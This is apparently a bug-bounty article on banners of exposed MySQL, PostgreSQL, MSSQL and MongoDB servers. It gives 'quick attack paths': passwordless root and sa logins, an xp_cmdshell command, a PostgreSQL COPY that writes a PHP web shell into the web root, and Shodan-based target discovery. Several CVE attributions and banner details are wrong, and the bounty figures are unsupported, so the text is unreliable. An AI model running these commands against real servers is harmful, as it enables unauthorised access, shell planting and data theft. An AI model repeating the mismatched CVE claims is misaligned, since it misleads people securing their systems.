When a database server is accidentally exposed to the internet (port open without firewall, NAT misconfiguration, cloud security group too permissive), the very first thing an attacker sees is the banner, the greeting string the service sends right after connection.
In 2025–2026, these banners are still the fastest path to compromise because:
a) they usually contain exact software name + version
b) version → known CVE lookup → exploit in minutes
c) many older versions have unauthenticated RCE, auth bypass, or full DB dump vulnerabilities
Here are the most common banners you’ll see on exposed MySQL, PostgreSQL, Microsoft SQL Server (MSSQL), and MongoDB instances, together with why each one is dangerous and what bounty hunters / attackers look for.
MySQL / MariaDB (port 3306)
Typical banners (real captures)
5.7.44-0ubuntu0.22.04.1-log
8.0.36-0ubuntu0.22.04.1
10.6.18-MariaDB-0ubuntu0.22.04.1
5.5.68-MariaDB
Danger levels & bounties
a) 5.5.x / 5.6.x / 5.7.x before ~5.7.44 → CVE-2021-27928, CVE-2022-1292, older UDF code execution → $8k–$30k bounties
b) MariaDB 10.3.x–10.5.x → several unauthenticated RCEs and auth bypasses → $10k–$35k
c) No password on root / trust auth → banner shows “root@hostname” → instant DB dump → $5k–$25k
d) Exposed INFORMATION_SCHEMA → full schema leak → pivot to internal apps
Quick attack path mysql -h target.com -u root (no password) → dump users/hashes → escalate.
PostgreSQL (port 5432)
Typical banners
PostgreSQL 12.4 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 10.2.1 20210110, 64-bit
PostgreSQL 15.3, server encoding UTF8
PostgreSQL 9.6.24
Danger levels & bounties
a) 9.x / 10.x / 11.x → CVE-2020-14349 COPY FROM PROGRAM RCE, older auth bypasses → $10k–$40k
b) Trust auth in pg_hba.conf → banner often leaks “trust” mode → instant login → $8k–$35k
c) Superuser with no password → full DB + OS command execution via COPY / language handlers → $15k–$50k
d) Exposed default database “postgres” → often no auth → schema dump → internal recon
Quick attack path psql -h target.com -U postgres → if trust/no password → COPY (SELECT '<?php system($_GET[cmd]); ?>') TO '/var/www/html/shell.php';
Microsoft SQL Server (MSSQL) (port 1433)
Typical banners
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5
Microsoft SQL Server 2017 (RTM-CU31) - 14.0.3456.2
Microsoft SQL Server 2016 (SP3) - 13.0.6300.2
Danger levels & bounties
a) 2014 / 2016 / 2017 before latest CU → CVE-2020-0618 xp_cmdshell RCE, older pre-auth bugs → $10k–$45k
b) SA account with blank/weak password → banner often leaks server name → sqlcmd -S target.com -U sa -P "" → xp_cmdshell → full RCE → $15k–$50k
c) Linked server abuse → pivot to other internal SQL instances
Quick attack path sqlcmd -S target.com -U sa -P "" -Q "EXEC xp_cmdshell 'whoami'" → instant shell if SA is open.
MongoDB (port 27017)
Typical banners
MongoDB Server 4.4.29
MongoDB Server 5.0.24
MongoDB Server 6.0.14
Danger levels & bounties
a) 3.x / 4.x without auth → full DB dump (users, PII, credentials) → $5k–$25k
b) No bindIp restriction → banner leaks version → CVE-2019-10758 / CVE-2020-2460 RCE → $10k–$40k
c) JavaScript injection via $where (older versions) → full RCE
Quick attack path mongo target.com:27017 → if no auth → db.getCollectionNames() → dump everything.
A few practical steps for discovering and reporting on databases:
1. Use either Shodan, Censys, or ZoomEye to find a variety of databases by performing a search using the following four queries:
Ports: 3306 , 5432 , 1433 , 27017
2. To perform an analysis of the banner to see whether a CVE exists, or if a bounty is available, obtain the version number and search the NVD (nvd.nist.gov) or Exploit-db.com for an unauthenticated RCE or database dump against the version number you obtained. If an unauthenticated RCE or database dump was located, you should report it immediately. {Where an unauthenticated RCE is located, generally a bounty of $5K - $50K and up will be offered on private programs}.
3. When you have proof of concept, do not run any destructive payloads. Just display the banner, version number and proof that no authentication is needed (ex. mysql-h target.com -u root connects without password)
Exposed database ports with default/weak auth remain some of the highest-paying bug bounty finds because impact is almost always “critical”: full data exfil, RCE, internal pivot. Grab nmap or netcat, scan your own perimeter once a month, you might find something that pays very well, or worse, something already being exploited.
